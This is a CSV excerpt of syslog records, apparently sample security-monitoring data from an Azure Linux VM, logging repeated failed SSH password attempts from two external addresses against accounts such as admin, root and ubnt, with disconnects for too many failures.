+12366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:35,UbuntuDevEnv,2019-06-26 03:39:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:37,UbuntuDevEnv,2019-06-26 03:39:36,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 51539 ssh2,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:37,UbuntuDevEnv,2019-06-26 03:39:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:39,UbuntuDevEnv,2019-06-26 03:39:38,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 51539 ssh2,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:39,UbuntuDevEnv,2019-06-26 03:39:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:41,UbuntuDevEnv,2019-06-26 03:39:41,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 51539 ssh2,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:41,UbuntuDevEnv,2019-06-26 03:39:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:43,UbuntuDevEnv,2019-06-26 03:39:42,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 51539 ssh2,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:43,UbuntuDevEnv,2019-06-26 03:39:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:45,UbuntuDevEnv,2019-06-26 03:39:45,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 51539 ssh2,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:45,UbuntuDevEnv,2019-06-26 03:39:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:48,UbuntuDevEnv,2019-06-26 03:39:48,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 45.122.222.193 port 51539: Too many authentication failures [preauth],116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:48,UbuntuDevEnv,2019-06-26 03:39:48,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 45.122.222.193 port 51539 ssh2 [preauth],116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:48,UbuntuDevEnv,2019-06-26 03:39:48,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 51539 ssh2,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,51539,,
+12380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:48,UbuntuDevEnv,2019-06-26 03:39:48,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+12381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:48,UbuntuDevEnv,2019-06-26 03:39:48,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:58,UbuntuDevEnv,2019-06-26 03:39:57,auth,UbuntuDevEnv,info,Invalid user admin from 45.122.222.193 port 52984,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,52984,,
+12383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:58,UbuntuDevEnv,2019-06-26 03:39:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:39:58,UbuntuDevEnv,2019-06-26 03:39:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:00,UbuntuDevEnv,2019-06-26 03:39:59,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 52984 ssh2,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,52984,,
+12386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:00,UbuntuDevEnv,2019-06-26 03:40:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:00,UbuntuDevEnv,2019-06-26 03:40:00,auth,UbuntuDevEnv,info,Invalid user ethos from 118.24.131.236 port 37994,116217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,118.24.131.2,37994,,
+12388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:01,UbuntuDevEnv,2019-06-26 03:40:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:01,UbuntuDevEnv,2019-06-26 03:40:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,116217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:02,UbuntuDevEnv,2019-06-26 03:40:02,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 52984 ssh2,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,52984,,
+12391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:02,UbuntuDevEnv,2019-06-26 03:40:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:03,UbuntuDevEnv,2019-06-26 03:40:02,auth,UbuntuDevEnv,info,Failed password for invalid user ethos from 118.24.131.236 port 37994 ssh2,116217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,118.24.131.2,37994,,
+12393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:03,UbuntuDevEnv,2019-06-26 03:40:02,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 37994:11: Bye Bye [preauth],116217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,37994,,
+12394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:03,UbuntuDevEnv,2019-06-26 03:40:02,auth,UbuntuDevEnv,info,Disconnected from invalid user ethos 118.24.131.236 port 37994 [preauth],116217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,118.24.131.2,37994,,
+12395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:04,UbuntuDevEnv,2019-06-26 03:40:04,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 45.122.222.193 port 52984 ssh2,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,52984,,
+12396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:05,UbuntuDevEnv,2019-06-26 03:40:04,auth,UbuntuDevEnv,info,Received disconnect from 45.122.222.193 port 52984:11: Bye Bye [preauth],116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,52984,,
+12397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:05,UbuntuDevEnv,2019-06-26 03:40:04,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:05,UbuntuDevEnv,2019-06-26 03:40:04,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 45.122.222.193 port 52984 [preauth],116208,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,45.122.222.1,52984,,
+12399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:07,UbuntuDevEnv,2019-06-26 03:40:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193  user=root,116252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,45.122.222.1,,0,
+12400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:10,UbuntuDevEnv,2019-06-26 03:40:09,auth,UbuntuDevEnv,info,Failed password for root from 45.122.222.193 port 53553 ssh2,116252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,53553,,
+12401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:21,UbuntuDevEnv,2019-06-26 03:40:20,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 45.122.222.193 port 53553 ssh2],116252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,53553,,
+12402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:21,UbuntuDevEnv,2019-06-26 03:40:20,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193  user=root,116252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,45.122.222.1,,0,
+12403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:21,UbuntuDevEnv,2019-06-26 03:40:20,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 45.122.222.193 port 53553: Too many authentication failures [preauth],116252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,45.122.222.1,53553,,
+12404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:21,UbuntuDevEnv,2019-06-26 03:40:20,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,116252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+12405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:21,UbuntuDevEnv,2019-06-26 03:40:20,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 45.122.222.193 port 53553 ssh2 [preauth],116252,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,53553,,
+12406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:30,UbuntuDevEnv,2019-06-26 03:40:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193  user=root,116330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,45.122.222.1,,0,
+12407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:33,UbuntuDevEnv,2019-06-26 03:40:32,auth,UbuntuDevEnv,info,Failed password for root from 45.122.222.193 port 55042 ssh2,116330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,55042,,
+12408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:37,UbuntuDevEnv,2019-06-26 03:40:37,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193  user=root,116330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,45.122.222.1,,0,
+12409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:37,UbuntuDevEnv,2019-06-26 03:40:37,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 45.122.222.193 port 55042 [preauth],116330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,45.122.222.1,55042,,
+12410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:37,UbuntuDevEnv,2019-06-26 03:40:37,auth,UbuntuDevEnv,info,Received disconnect from 45.122.222.193 port 55042:11: Bye Bye [preauth],116330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,55042,,
+12411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:37,UbuntuDevEnv,2019-06-26 03:40:36,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 45.122.222.193 port 55042 ssh2],116330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,55042,,
+12412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:39,UbuntuDevEnv,2019-06-26 03:40:38,auth,UbuntuDevEnv,info,Invalid user ubnt from 45.122.222.193 port 55595,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
+12413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:39,UbuntuDevEnv,2019-06-26 03:40:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:39,UbuntuDevEnv,2019-06-26 03:40:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:41,UbuntuDevEnv,2019-06-26 03:40:41,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 55595 ssh2,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
+12416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:41,UbuntuDevEnv,2019-06-26 03:40:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:44,UbuntuDevEnv,2019-06-26 03:40:43,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 55595 ssh2,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
+12418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:44,UbuntuDevEnv,2019-06-26 03:40:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:46,UbuntuDevEnv,2019-06-26 03:40:46,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 55595 ssh2,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
+12420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:47,UbuntuDevEnv,2019-06-26 03:40:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:48,UbuntuDevEnv,2019-06-26 03:40:48,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 55595 ssh2,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
+12422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:49,UbuntuDevEnv,2019-06-26 03:40:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:50,UbuntuDevEnv,2019-06-26 03:40:50,auth,UbuntuDevEnv,info,Failed password for invalid user ubnt from 45.122.222.193 port 55595 ssh2,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
+12424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:50,UbuntuDevEnv,2019-06-26 03:40:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:40:52,UbuntuDevEnv,2019-06-26 03:40:52,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user ubnt from 45.122.222.193 port 55595 ssh2 [preauth],116359,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubnt,45.122.222.1,55595,,
